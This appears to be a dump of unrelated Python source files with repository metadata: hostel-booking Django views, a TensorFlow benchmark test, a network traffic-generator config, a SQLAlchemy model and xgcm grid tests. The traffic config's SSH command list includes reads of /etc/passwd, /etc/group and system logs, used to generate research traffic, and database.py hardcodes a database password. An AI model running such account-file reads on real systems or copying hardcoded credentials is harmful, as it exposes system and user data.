return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def add_to_inventory(request):
if request.method == 'POST':
item_name = request.POST.get('item_name')
bill_number = request.POST.get('bill_number')
quantity = (request.POST.get('quantity'))
cost = request.POST.get('cost')
consumable = request.POST.get('consumable')
# if(Inventory.objects.get(item_name = item_name)):
# Inventory.objects.filter(item_name=item_name).update(quantity=quantity,consumable=consumable)
# else:
Inventory.objects.create(
item_name=item_name, quantity=quantity, consumable=consumable)
item_name_key = Inventory.objects.get(item_name=item_name)
InventoryBill.objects.create(
item_name=item_name_key, bill_number=bill_number, cost=cost)
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def update_inventory(request):
if request.method == 'POST':
id = request.POST.get('id')
quantity = request.POST.get('quantity')
Inventory.objects.filter(id=id).update(quantity=quantity)
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def edit_room_status(request):
if request.method == 'POST':
room_number = request.POST.get('room_number')
room_status = request.POST.get('room_status')
        RoomDetail.objects.filter(room_number=room_number).update(status=room_status)
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def bill_between_dates(request):
if request.method == 'POST':
date_1 = request.POST.get('start_date')
date_2 = request.POST.get('end_date')
bill_range_bw_dates = bill_range(date_1, date_2)
meal_total = 0
room_total = 0
individual_total =[]
# calculating room and mess bill booking wise
for i in bill_range_bw_dates:
meal_total = meal_total + i.meal_bill
room_total = room_total + i.room_bill
individual_total.append(i.meal_bill + i.room_bill)
total_bill = meal_total + room_total
# zip(bill_range_bw_dates, individual_total)
return render(request, "vhModule/booking_bw_dates.html", {
# 'booking_bw_dates': bill_range_bw_dates,
'booking_bw_dates_length': bill_range_bw_dates,
'meal_total' : meal_total,
'room_total' :room_total,
'total_bill' : total_bill,
'individual_total' : individual_total,
'booking_bw_dates': zip(bill_range_bw_dates, individual_total)
})
else:
return HttpResponseRedirect('/visitorhostel/')
def bill_range(date1, date2):
    # bookings that overlap the [date1, date2] window in any way
    bookings = BookingDetail.objects.filter(
        Q(booking_from__lte=date1, booking_to__gte=date1) |
        Q(booking_from__gte=date1, booking_to__lte=date2) |
        Q(booking_from__lte=date2, booking_to__gte=date2))
# bill_details = Bill.objects.filter(Q(booking__booking_from__lte=date1, booking__booking_to__gte=date1, booking__status="Confirmed") | Q(booking__booking_from__gte=date1,
# booking__booking_to__lte=date2, booking__status="Confirmed") | Q(booking__booking_from__lte=date2, booking__booking_to__gte=date2, status="Confirmed") | Q(booking_from__lte=date1, booking__booking_to__gte=date1, status="CheckedIn") | Q(booking__booking_from__gte=date1, booking__booking_to__lte=date2, booking__status="CheckedIn") | Q(booking__booking_from__lte=date2, booking__booking_to__gte=date2, booking__status="CheckedIn"))
bookings_bw_dates = []
booking_ids = []
for booking_id in bookings:
booking_ids.append(booking_id.id)
all_bill = Bill.objects.all().order_by('-id')
for b_id in booking_ids:
if Bill.objects.filter(booking__pk=b_id).exists() :
bill_id = Bill.objects.get(booking__pk=b_id)
bookings_bw_dates.append(bill_id)
return bookings_bw_dates
def booking_details(date1, date2):
bookings = BookingDetail.objects.filter(Q(booking_from__lte=date1, booking_to__gte=date1, status="Confirmed") | Q(booking_from__gte=date1,
booking_to__lte=date2, status="Confirmed") | Q(booking_from__lte=date2, booking_to__gte=date2, status="Confirmed") | Q(booking_from__lte=date1, booking_to__gte=date1, status="Forward") | Q(booking_from__gte=date1,
booking_to__lte=date2, status="Forward") | Q(booking_from__lte=date2, booking_to__gte=date2, status="Forward") | Q(booking_from__lte=date1, booking_to__gte=date1, status="CheckedIn") | Q(booking_from__gte=date1, booking_to__lte=date2, status="CheckedIn") | Q(booking_from__lte=date2, booking_to__gte=date2, status="CheckedIn"))
booked_rooms = []
for booking in bookings:
for room in booking.rooms.all():
booked_rooms.append(room)
available_rooms = []
all_rooms = RoomDetail.objects.all()
for room in all_rooms:
if room not in booked_rooms:
available_rooms.append(room)
return available_rooms
# function for finding forwarded booking rooms
def forwarded_booking_details(date1, date2):
bookings = BookingDetail.objects.filter(Q(booking_from__lte=date1, booking_to__gte=date1, status="Confirmed") | Q(booking_from__gte=date1,
booking_to__lte=date2, status="Confirmed") | Q(booking_from__lte=date2, booking_to__gte=date2, status="Confirmed") | Q(booking_from__lte=date1, booking_to__gte=date1, status="CheckedIn") | Q(booking_from__gte=date1, booking_to__lte=date2, status="CheckedIn") | Q(booking_from__lte=date2, booking_to__gte=date2, status="CheckedIn"))
forwarded_bookings = BookingDetail.objects.filter(Q(booking_from__lte=date1, booking_to__gte=date1, status="Forward") | Q(booking_from__gte=date1,
booking_to__lte=date2, status="Forward") | Q(booking_from__lte=date2, booking_to__gte=date2, status="Forward") )
booked_rooms = []
# Bookings for rooms which are forwarded but not yet approved
forwarded_booking_rooms = []
for booking in forwarded_bookings:
for room in booking.rooms.all():
forwarded_booking_rooms.append(room)
return forwarded_booking_rooms
# View for forwarding booking - from VhCaretaker to VhIncharge
@login_required(login_url='/accounts/login/')
def forward_booking(request):
if request.method == 'POST':
user = request.user
booking_id = request.POST.get('id')
previous_category = request.POST.get('previous_category')
modified_category = request.POST.get('modified_category')
rooms = request.POST.getlist('rooms[]')
print(rooms)
BookingDetail.objects.filter(id=booking_id).update(status="Forward")
booking = BookingDetail.objects.get(id=booking_id)
bd = BookingDetail.objects.get(id=booking_id)
bd.modified_visitor_category = modified_category
count_rooms = 0
for room in rooms:
count_rooms = count_rooms + 1
room_object = RoomDetail.objects.get(room_number=room)
bd.rooms.add(room_object)
bd.number_of_rooms_alloted = count_rooms
bd.save()
dashboard_bookings = BookingDetail.objects.filter(Q(status = "Pending") | Q(status="Forward") | Q(status = "Confirmed") | Q(status = 'Rejected'), booking_to__gte=datetime.datetime.today(), intender=user).order_by('booking_from')
# return render(request, "vhModule/visitorhostel.html",
# {'dashboard_bookings' : dashboard_bookings})
incharge_name = HoldsDesignation.objects.get(designation__name = "VhIncharge")
# notify incharge about forwarded booking
visitors_hostel_notif(request.user, incharge_name.user, 'booking_forwarded')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/') | 44.322234 | 551 | 0.599821 |
4a1f439900b9d7b922e727721943eff86fadfec5 | 24 | py | Python | test/__init__.py | alphagov/service-manager | fa507758b5376a528658f32728427407fe87aaf3 | [
"Apache-2.0"
] | null | null | null | test/__init__.py | alphagov/service-manager | fa507758b5376a528658f32728427407fe87aaf3 | [
"Apache-2.0"
] | null | null | null | test/__init__.py | alphagov/service-manager | fa507758b5376a528658f32728427407fe87aaf3 | [
"Apache-2.0"
] | 2 | 2019-08-29T11:38:05.000Z | 2021-04-10T20:07:03.000Z | __author__ = 'vsharman'
| 12 | 23 | 0.75 |
4a1f44511dbe83789502f175ada52ff603363b14 | 2,058 | py | Python | Liquid-job-benchmarks/scripts/tf_cnn_benchmarks/all_reduce_benchmark_test.py | PasaLab/YAO | 2e70203197cd79f9522d65731ee5dc0eb236b005 | [
"Apache-2.0"
] | 2 | 2021-08-30T14:12:09.000Z | 2022-01-20T02:14:22.000Z | Liquid-job-benchmarks/scripts/tf_cnn_benchmarks/all_reduce_benchmark_test.py | PasaLab/YAO | 2e70203197cd79f9522d65731ee5dc0eb236b005 | [
"Apache-2.0"
] | null | null | null | Liquid-job-benchmarks/scripts/tf_cnn_benchmarks/all_reduce_benchmark_test.py | PasaLab/YAO | 2e70203197cd79f9522d65731ee5dc0eb236b005 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for all_reduce_benchmark.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
import all_reduce_benchmark
import benchmark_cnn
import test_util
class AllReduceBenchmarkTest(tf.test.TestCase):
"""Tests the all-reduce benchmark."""
def _test_run_benchmark(self, params):
"""Tests that run_benchmark() runs successfully with the params."""
logs = []
with test_util.monkey_patch(all_reduce_benchmark,
log_fn=test_util.print_and_add_to_list(logs)):
bench_cnn = benchmark_cnn.BenchmarkCNN(params)
all_reduce_benchmark.run_benchmark(bench_cnn, num_iters=5)
self.assertRegex(logs[-1], '^Average time per step: [0-9.]+$')
def test_run_benchmark(self):
"""Tests that run_benchmark() runs successfully."""
params = benchmark_cnn.make_params(num_batches=10,
variable_update='replicated',
num_gpus=2)
self._test_run_benchmark(params)
params = params._replace(hierarchical_copy=True, gradient_repacking=8,
num_gpus=8)
self._test_run_benchmark(params)
if __name__ == '__main__':
tf.disable_v2_behavior()
tf.test.main()
| 38.830189 | 81 | 0.664723 |
4a1f4458dd00aba852b2c48a6aae722ff94339c1 | 6,736 | py | Python | trafficgen/PyTgen/config.py | SalikLP/classification-of-encrypted-traffic | 3c86e098aab58941f9339bb64945c1112ab556ef | [
"MIT"
] | 35 | 2018-05-25T16:48:23.000Z | 2022-03-15T14:35:07.000Z | trafficgen/PyTgen/config.py | SalikLP/classification-of-encrypted-traffic | 3c86e098aab58941f9339bb64945c1112ab556ef | [
"MIT"
] | 3 | 2018-03-18T13:03:09.000Z | 2020-01-17T12:09:12.000Z | trafficgen/PyTgen/config.py | SalikLP/classification-of-encrypted-traffic | 3c86e098aab58941f9339bb64945c1112ab556ef | [
"MIT"
] | 14 | 2018-05-25T16:48:24.000Z | 2022-01-04T12:56:31.000Z | '''
Config file adaptation/modification of the PyTgen generator config.py
'''
import logging
#
# This is a default configuration for the classification of encrypted traffic project
#
class Conf(object):
# maximum number of worker threads that can be used to execute the jobs.
# the program will start using 3 threads and spawn new ones if needed.
# this setting depends on the number of jobs that have to be executed
# simultaneously (not the number of jobs given in the config file).
maxthreads = 15
# set to "logging.INFO" or "logging.DEBUG"
loglevel = logging.DEBUG
# ssh commands that will be randomly executed by the ssh traffic generator
ssh_commands = ['ls', 'cd', 'cd /etc', 'ps ax', 'date', 'mount', 'free', 'vmstat',
'touch /tmp/tmpfile', 'rm /tmp/tmpfile', 'ls /tmp/tmpfile',
'tail /etc/hosts', 'tail /etc/passwd', 'tail /etc/fstab',
'cat /var/log/messages', 'cat /etc/group', 'cat /etc/mtab']
# urls the http generator will randomly fetch from
https_urls = ['https://www.dr.dk/', 'https://da.wikipedia.org/wiki/Forside',
'https://en.wikipedia.org/wiki/Main_Page', 'https://www.dk-hostmaster.dk/',
'https://www.cph.dk/', 'https://translate.google.com/', 'https://www.borger.dk/',
'https://www.sdu.dk/da/', 'https://www.sundhed.dk/', 'https://www.facebook.com/',
'https://www.ug.dk/', 'https://erhvervsstyrelsen.dk/', 'https://www.nets.eu/dk-da',
'https://www.jobindex.dk/', 'https://www.rejseplanen.dk/webapp/index.html', 'https://yousee.dk/',
'https://www.sparnord.dk/', 'https://gigahost.dk/', 'https://www.information.dk/',
'https://stps.dk/', 'https://www.skat.dk/', 'https://danskebank.dk/privat', 'https://www.sst.dk/']
http_urls = ['http://naturstyrelsen.dk/', 'http://www.valutakurser.dk/', 'http://ordnet.dk/ddo/forside',
'http://www.speedtest.net/', 'http://bygningsreglementet.dk/', 'http://www.ft.dk/', 'http://tv2.dk/',
'http://www.kl.dk/', 'http://www.symbiosis.dk/', 'http://www.noegletal.dk/',
'http://novonordiskfonden.dk/da', 'http://frida.fooddata.dk/',
'http://www.arbejdsmiljoforskning.dk/da', 'http://www.su.dk/', 'http://www.trafikstyrelsen.dk/da.aspx',
'http://www.regioner.dk/', 'http://www.geus.dk/UK/Pages/default.aspx', 'http://bm.dk/',
'http://www.m.dk/#!/', 'http://www.regionsjaelland.dk/Sider/default.aspx',
'http://www.trafikstyrelsen.dk/da.aspx']
# http_intern = ['http://web.intern.ndsec']
# a number of files that will randomly be used for ftp upload
ftp_put = ['~/files/file%s' % i for i in range(0, 9)]
# a number of files that will randomly be used for ftp download
ftp_get = ['~/files/file%s' % i for i in range(0, 9)]
# array of source-destination tuples for sftp upload
sftp_put = [('~/files/file%s' % i, '/tmp/file%s' % i) for i in range(0, 9)]
# array of source-destination tuples for sftp download
sftp_get = [('/media/share/files/file%s' % i, '~/files/tmp/file%s' % i) for i in range(0, 9)]
# significant part of the shell prompt to be able to recognize
# the end of a telnet data transmission
telnet_prompt = "$ "
# job configuration (see config.example.py)
jobdef = [
# http (intern)
# ('http_gen', [(start_hour, start_min), (end_hour, end_min), (interval_min, interval_sec)], [urls, retry, sleep_multiply])
# ('http_gen', [(9, 0), (16, 30), (60, 0)], [http_intern, 2, 30]),
# ('http_gen', [(9, 55), (9, 30), (5, 0)], [http_intern, 5, 20]),
# ('http_gen', [(12, 0), (12, 30), (2, 0)], [http_intern, 6, 10]),
# ('http_gen', [(10, 50), (12, 0), (10, 0)], [http_intern, 2, 10]),
# ('http_gen', [(15, 0), (17, 30), (30, 0)], [http_intern, 8, 20]),
#
# http (extern)
# ('http_gen', [(12, 0), (12, 30), (5, 0)], [http_extern, 10, 20]),
# ('http_gen', [(9, 0), (17, 0), (30, 0)], [http_extern, 5, 30]),
('http_gen', [(11, 0), (13, 0), (0, 10)], [http_urls, 1, 5]),
('http_gen', [(11, 0), (13, 0), (0, 10)], [https_urls, 1, 5]),
# ('http_gen', [(9, 0), (17, 0), (90, 0)], [http_extern, 10, 30]),
# ('http_gen', [(12, 0), (12, 10), (5, 0)], [http_extern, 15, 20]),
#
# smtp
# ('smtp_gen', [(9, 0), (18, 0), (120, 0)], ['mail.extern.ndsec', 'mail2', 'mail', '[email protected]', '[email protected]']),
# ('smtp_gen', [(12, 0), (13, 0), (30, 0)], ['mail.extern.ndsec', 'mail20', 'mail', '[email protected]', '[email protected]']),
#
# ftp
# ('ftp_gen', [(9, 0), (11, 0), (15, 0)], ['ftp.intern.ndsec', 'ndsec', 'ndsec', ftp_put, ftp_get, 10, False, 5]),
# ('ftp_gen', [(10, 0), (18, 0), (135, 0)], ['ftp.intern.ndsec', 'ndsec', 'ndsec', ftp_put, [], 2, False]),
#
# nfs / smb
# ('copy_gen', [(9, 0), (12, 0), (90, 0)], [None, 'Z:/tmp/dummyfile.txt', 30]),
# ('copy_gen', [(10, 0), (16, 0), (120, 0)], [None, 'Z:/tmp/dummyfile.txt', 80]),
# ('copy_gen', [(12, 0), (17, 0), (160, 0)], [None, 'Z:/tmp/dummyfile.txt', 180]),
# ('copy_gen', [(9, 0), (18, 0), (0, 10)], ['file1', 'file2']),
#
# telnet
# ('telnet_gen', [(9, 0), (18, 0), (60, 0)], ['telnet.intern.ndsec', None, 'ndsec', 'ndsec', 5, ssh_commands, telnet_prompt, 10]),
# ('telnet_gen', [(9, 0), (18, 0), (240, 0)], ['telnet.intern.ndsec', 23, 'ndsec', 'ndsec', 2, [], telnet_prompt]),
# ('telnet_gen', [(16, 0), (18, 0), (120, 0)], ['telnet.intern.ndsec', 23, 'ndsec', 'wrongpass', 2, [], telnet_prompt]),
#
# ssh
# ('ssh_gen', [(9, 0), (18, 0), (120, 0)], ['ssh.intern.ndsec', 22, 'ndsec', 'ndsec', 10, ssh_commands]),
# ('ssh_gen', [(9, 0), (18, 0), (240, 0)], ['ssh.intern.ndsec', 22, 'ndsec', 'ndsec', 60, [], 30]),
# ('ssh_gen', [(9, 0), (18, 0), (120, 0)], ['192.168.10.50', 22, 'dummy1', 'dummy1', 5, ssh_commands]),
# ('ssh_gen', [(12, 0), (14, 0), (120, 0)], ['ssh.intern.ndsec', 22, 'dummy1', 'wrongpass', 5, ssh_commands]),
#
# sftp
# ('sftp_gen', [(17, 0), (18, 0), (60, 0)], ['127.0.0.1', 22, 'user', 'pass', sftp_put, sftp_get, 5, 1]),
] | 62.37037 | 155 | 0.513955 |
4a1f44dcd6c5b6007f9a3c5361a2f8d6bbe47df0 | 630 | py | Python | database.py | FissionCat/cherrypy-practice | a35d78d770109731dd5b0f63d088e8ed6405106f | [
"MIT"
] | 1 | 2016-08-06T03:10:16.000Z | 2016-08-06T03:10:16.000Z | database.py | FissionCat/cherrypy-practice | a35d78d770109731dd5b0f63d088e8ed6405106f | [
"MIT"
] | null | null | null | database.py | FissionCat/cherrypy-practice | a35d78d770109731dd5b0f63d088e8ed6405106f | [
"MIT"
] | null | null | null | from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Session = sessionmaker()
engine = create_engine("postgresql+pg8000://postgres:master@localhost/cherrypy", echo=True)
Session.configure(bind=engine)
Base = declarative_base()
class User(Base):
__tablename__ = "users"
id = Column(Integer, primary_key=True)
username = Column(String)
fullname = Column(String)
password = Column(String)
def __init__(self, username, fullname, password):
self.username = username
self.fullname = fullname
self.password = password
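# ----------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original file): how the Session
# factory and the User model defined above might be exercised. It assumes the
# PostgreSQL instance named in the connection string is reachable; the demo
# user below is a placeholder.
if __name__ == '__main__':
    # make sure the users table exists before inserting (idempotent)
    Base.metadata.create_all(engine)
    session = Session()
    # add and persist a demo user
    session.add(User(username='jdoe', fullname='Jane Doe', password='secret'))
    session.commit()
    # read it back to confirm the round trip
    for stored in session.query(User).filter_by(username='jdoe'):
        print(stored.id, stored.username, stored.fullname)
    session.close()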
Base.metadata.create_all(engine) | 27.391304 | 91 | 0.780952 |
4a1f44fe436231ecd984d7d7005440a7e7bf09f1 | 28,112 | py | Python | xgcm/test/test_grid.py | albernsrya/xgcm | 9bd495bbfc14a0c9e68cce880e2303c7c744d2c8 | [
"MIT"
] | 1 | 2021-07-03T14:07:47.000Z | 2021-07-03T14:07:47.000Z | xgcm/test/test_grid.py | albernsrya/xgcm | 9bd495bbfc14a0c9e68cce880e2303c7c744d2c8 | [
"MIT"
] | null | null | null | xgcm/test/test_grid.py | albernsrya/xgcm | 9bd495bbfc14a0c9e68cce880e2303c7c744d2c8 | [
"MIT"
] | null | null | null | import numpy as np
import pytest
import xarray as xr
from xgcm.grid import Axis, Grid
from .datasets import all_2d # noqa: F401
from .datasets import all_datasets # noqa: F401
from .datasets import datasets # noqa: F401
from .datasets import datasets_grid_metric # noqa: F401
from .datasets import nonperiodic_1d # noqa: F401
from .datasets import nonperiodic_2d # noqa: F401
from .datasets import periodic_1d # noqa: F401
from .datasets import periodic_2d # noqa: F401
# helper function to produce axes from datasets
def _get_axes(ds):
all_axes = {ds[c].attrs["axis"] for c in ds.dims if "axis" in ds[c].attrs}
axis_objs = {ax: Axis(ds, ax) for ax in all_axes}
return axis_objs
@pytest.mark.parametrize("discontinuity", [None, 10, 360])
@pytest.mark.parametrize("right", [True, False])
def test_extend_right_left(discontinuity, right):
ds = datasets["1d_left"]
axis = Axis(ds, "X")
if discontinuity is None:
ref = 0
else:
ref = discontinuity
kw = {"boundary_discontinuity": discontinuity}
if right:
extended_raw = axis._extend_right(ds.XC, **kw)
extended = extended_raw[-1]
expected = ds.XC.data[0] + ref
else:
extended_raw = axis._extend_left(ds.XC, **kw)
extended = extended_raw[0]
expected = ds.XC.data[-1] - ref
assert isinstance(extended_raw, np.ndarray)
assert extended == expected
@pytest.mark.parametrize("fill_value", [0, 10, 20])
@pytest.mark.parametrize("boundary", ["fill", "extend", "extrapolate"])
@pytest.mark.parametrize("periodic", [True, False])
@pytest.mark.parametrize("is_left_edge", [True, False])
@pytest.mark.parametrize("boundary_discontinuity", [None, 360])
def test_get_edge_data(
periodic, fill_value, boundary, is_left_edge, boundary_discontinuity
):
ds = datasets["1d_left"]
axis = Axis(ds, "X", periodic=periodic)
edge = axis._get_edge_data(
ds.XC,
boundary=boundary,
fill_value=fill_value,
is_left_edge=is_left_edge,
boundary_discontinuity=boundary_discontinuity,
)
if is_left_edge:
edge_periodic = ds.XC.data[-1]
if boundary_discontinuity is not None:
edge_periodic = edge_periodic - boundary_discontinuity
edge_extend = ds.XC.data[0]
edge_extra = ds.XC.data[0] - np.diff(ds.XC.data[0:2])
else:
edge_periodic = ds.XC.data[0]
if boundary_discontinuity is not None:
edge_periodic = edge_periodic + boundary_discontinuity
edge_extend = ds.XC.data[-1]
edge_extra = ds.XC.data[-1] + np.diff(ds.XC.data[-2:])
edge_fill = fill_value
if periodic:
assert edge_periodic == edge
else:
if boundary == "fill":
assert edge_fill == edge
elif boundary == "extend":
assert edge_extend == edge
elif boundary == "extrapolate":
assert edge_extra == edge
else:
assert 0
def test_create_axis(all_datasets):
ds, periodic, expected = all_datasets
axis_objs = _get_axes(ds)
for ax_expected, coords_expected in expected["axes"].items():
assert ax_expected in axis_objs
this_axis = axis_objs[ax_expected]
for axis_name, coord_name in coords_expected.items():
assert axis_name in this_axis.coords
assert this_axis.coords[axis_name] == coord_name
def _assert_axes_equal(ax1, ax2):
assert ax1.name == ax2.name
for pos, coord in ax1.coords.items():
assert pos in ax2.coords
assert coord == ax2.coords[pos]
assert ax1._periodic == ax2._periodic
assert ax1._default_shifts == ax2._default_shifts
assert ax1._facedim == ax2._facedim
# TODO: make this work...
# assert ax1._connections == ax2._connections
def test_create_axis_no_comodo(all_datasets):
ds, periodic, expected = all_datasets
axis_objs = _get_axes(ds)
# now strip out the metadata
ds_noattr = ds.copy()
for var in ds.variables:
ds_noattr[var].attrs.clear()
for axis_name, axis_coords in expected["axes"].items():
# now create the axis from scratch with no attributes
ax2 = Axis(ds_noattr, axis_name, coords=axis_coords)
# and compare to the one created with attributes
ax1 = axis_objs[axis_name]
assert ax1.name == ax2.name
for pos, coord_name in ax1.coords.items():
assert pos in ax2.coords
assert coord_name == ax2.coords[pos]
assert ax1._periodic == ax2._periodic
assert ax1._default_shifts == ax2._default_shifts
assert ax1._facedim == ax2._facedim
def test_create_axis_no_coords(all_datasets):
ds, periodic, expected = all_datasets
axis_objs = _get_axes(ds)
ds_drop = ds.drop_vars(list(ds.coords))
for axis_name, axis_coords in expected["axes"].items():
# now create the axis from scratch with no attributes OR coords
ax2 = Axis(ds_drop, axis_name, coords=axis_coords)
# and compare to the one created with attributes
ax1 = axis_objs[axis_name]
assert ax1.name == ax2.name
for pos, coord in ax1.coords.items():
assert pos in ax2.coords
assert ax1._periodic == ax2._periodic
assert ax1._default_shifts == ax2._default_shifts
assert ax1._facedim == ax2._facedim
def test_axis_repr(all_datasets):
ds, periodic, expected = all_datasets
axis_objs = _get_axes(ds)
for ax_name, axis in axis_objs.items():
r = repr(axis).split("\n")
assert r[0].startswith("<xgcm.Axis")
# TODO: make this more complete
def test_get_axis_coord(all_datasets):
ds, periodic, expected = all_datasets
axis_objs = _get_axes(ds)
for ax_name, axis in axis_objs.items():
# create a dataarray with each axis coordinate
for position, coord in axis.coords.items():
da = 1 * ds[coord]
assert axis._get_axis_coord(da) == (position, coord)
def test_axis_wrap_and_replace_2d(periodic_2d):
ds, periodic, expected = periodic_2d
axis_objs = _get_axes(ds)
da_xc_yc = 0 * ds.XC * ds.YC + 1
da_xc_yg = 0 * ds.XC * ds.YG + 1
da_xg_yc = 0 * ds.XG * ds.YC + 1
da_xc_yg_test = axis_objs["Y"]._wrap_and_replace_coords(
da_xc_yc, da_xc_yc.data, "left"
)
assert da_xc_yg.equals(da_xc_yg_test)
da_xg_yc_test = axis_objs["X"]._wrap_and_replace_coords(
da_xc_yc, da_xc_yc.data, "left"
)
assert da_xg_yc.equals(da_xg_yc_test)
def test_axis_wrap_and_replace_nonperiodic(nonperiodic_1d):
ds, periodic, expected = nonperiodic_1d
axis = Axis(ds, "X")
da_c = 0 * ds.XC + 1
da_g = 0 * ds.XG + 1
to = (set(expected["axes"]["X"].keys()) - {"center"}).pop()
da_g_test = axis._wrap_and_replace_coords(da_c, da_g.data, to)
assert da_g.equals(da_g_test)
da_c_test = axis._wrap_and_replace_coords(da_g, da_c.data, "center")
assert da_c.equals(da_c_test)
# helper functions for padding arrays
# this feels silly...I'm basically just re-coding the function in order to
# test it
def _pad_left(data, boundary, fill_value=0.0):
pad_val = data[0] if boundary == "extend" else fill_value
return np.hstack([pad_val, data])
def _pad_right(data, boundary, fill_value=0.0):
pad_val = data[-1] if boundary == "extend" else fill_value
return np.hstack([data, pad_val])
@pytest.mark.parametrize(
"boundary",
[None, "extend", "fill", pytest.param("extrapolate", marks=pytest.mark.xfail)],
)
@pytest.mark.parametrize("from_center", [True, False])
def test_axis_neighbor_pairs_nonperiodic_1d(nonperiodic_1d, boundary, from_center):
ds, periodic, expected = nonperiodic_1d
axis = Axis(ds, "X", periodic=periodic)
# detect whether this is an outer or inner case
# outer --> dim_line_diff = 1
# inner --> dim_line_diff = -1
dim_len_diff = len(ds.XG) - len(ds.XC)
if from_center:
to = (set(expected["axes"]["X"].keys()) - {"center"}).pop()
da = ds.data_c
else:
to = "center"
da = ds.data_g
shift = expected.get("shift") or False
# need boundary condition for everything but outer to center
if (boundary is None) and (
dim_len_diff == 0
or (dim_len_diff == 1 and from_center)
or (dim_len_diff == -1 and not from_center)
):
with pytest.raises(ValueError):
data_left, data_right = axis._get_neighbor_data_pairs(
da, to, boundary=boundary
)
else:
data_left, data_right = axis._get_neighbor_data_pairs(da, to, boundary=boundary)
if ((dim_len_diff == 1) and not from_center) or (
(dim_len_diff == -1) and from_center
):
expected_left = da.data[:-1]
expected_right = da.data[1:]
elif ((dim_len_diff == 1) and from_center) or (
(dim_len_diff == -1) and not from_center
):
expected_left = _pad_left(da.data, boundary)
expected_right = _pad_right(da.data, boundary)
elif (shift and not from_center) or (not shift and from_center):
expected_right = da.data
expected_left = _pad_left(da.data, boundary)[:-1]
else:
expected_left = da.data
expected_right = _pad_right(da.data, boundary)[1:]
np.testing.assert_allclose(data_left, expected_left)
np.testing.assert_allclose(data_right, expected_right)
@pytest.mark.parametrize(
"boundary", ["extend", "fill", pytest.param("extrapolate", marks=pytest.mark.xfail)]
)
def test_axis_cumsum(nonperiodic_1d, boundary):
ds, periodic, expected = nonperiodic_1d
axis = Axis(ds, "X", periodic=periodic)
axis_expected = expected["axes"]["X"]
cumsum_g = axis.cumsum(ds.data_g, to="center", boundary=boundary)
assert cumsum_g.dims == ds.data_c.dims
# check default "to"
assert cumsum_g.equals(axis.cumsum(ds.data_g, boundary=boundary))
to = set(axis_expected).difference({"center"}).pop()
cumsum_c = axis.cumsum(ds.data_c, to=to, boundary=boundary)
assert cumsum_c.dims == ds.data_g.dims
# check default "to"
assert cumsum_c.equals(axis.cumsum(ds.data_c, boundary=boundary))
cumsum_c_raw = np.cumsum(ds.data_c.data)
cumsum_g_raw = np.cumsum(ds.data_g.data)
if to == "right":
np.testing.assert_allclose(cumsum_c.data, cumsum_c_raw)
fill_value = 0.0 if boundary == "fill" else cumsum_g_raw[0]
np.testing.assert_allclose(
cumsum_g.data, np.hstack([fill_value, cumsum_g_raw[:-1]])
)
elif to == "left":
np.testing.assert_allclose(cumsum_g.data, cumsum_g_raw)
fill_value = 0.0 if boundary == "fill" else cumsum_c_raw[0]
np.testing.assert_allclose(
cumsum_c.data, np.hstack([fill_value, cumsum_c_raw[:-1]])
)
elif to == "inner":
np.testing.assert_allclose(cumsum_c.data, cumsum_c_raw[:-1])
fill_value = 0.0 if boundary == "fill" else cumsum_g_raw[0]
np.testing.assert_allclose(cumsum_g.data, np.hstack([fill_value, cumsum_g_raw]))
elif to == "outer":
np.testing.assert_allclose(cumsum_g.data, cumsum_g_raw[:-1])
fill_value = 0.0 if boundary == "fill" else cumsum_c_raw[0]
np.testing.assert_allclose(cumsum_c.data, np.hstack([fill_value, cumsum_c_raw]))
# not much point doing this...we don't have the right test datasets
# to really test the errors
# other_positions = {'left', 'right', 'inner', 'outer'}.difference({to})
# for pos in other_positions:
# with pytest.raises(KeyError):
# axis.cumsum(ds.data_c, to=pos, boundary=boundary)
@pytest.mark.parametrize(
"varname, axis_name, to, roll, roll_axis, swap_order",
[
("data_c", "X", "left", 1, 1, False),
("data_c", "Y", "left", 1, 0, False),
("data_g", "X", "center", -1, 1, True),
("data_g", "Y", "center", -1, 0, True),
],
)
def test_axis_neighbor_pairs_2d(
periodic_2d, varname, axis_name, to, roll, roll_axis, swap_order
):
ds, _, _ = periodic_2d
axis = Axis(ds, axis_name)
data = ds[varname]
data_left, data_right = axis._get_neighbor_data_pairs(data, to)
if swap_order:
data_left, data_right = data_right, data_left
np.testing.assert_allclose(data_left, np.roll(data.data, roll, axis=roll_axis))
np.testing.assert_allclose(data_right, data.data)
@pytest.mark.parametrize(
"boundary", ["extend", "fill", pytest.param("extrapolate", marks=pytest.mark.xfail)]
)
@pytest.mark.parametrize("from_center", [True, False])
def test_axis_diff_and_interp_nonperiodic_1d(nonperiodic_1d, boundary, from_center):
ds, periodic, expected = nonperiodic_1d
axis = Axis(ds, "X", periodic=periodic)
dim_len_diff = len(ds.XG) - len(ds.XC)
if from_center:
to = (set(expected["axes"]["X"].keys()) - {"center"}).pop()
coord_to = "XG"
da = ds.data_c
else:
to = "center"
coord_to = "XC"
da = ds.data_g
shift = expected.get("shift") or False
data = da.data
if (dim_len_diff == 1 and not from_center) or (dim_len_diff == -1 and from_center):
data_left = data[:-1]
data_right = data[1:]
elif (dim_len_diff == 1 and from_center) or (
dim_len_diff == -1 and not from_center
):
data_left = _pad_left(data, boundary)
data_right = _pad_right(data, boundary)
elif (shift and not from_center) or (not shift and from_center):
data_left = _pad_left(data[:-1], boundary)
data_right = data
else:
data_left = data
data_right = _pad_right(data[1:], boundary)
# interpolate
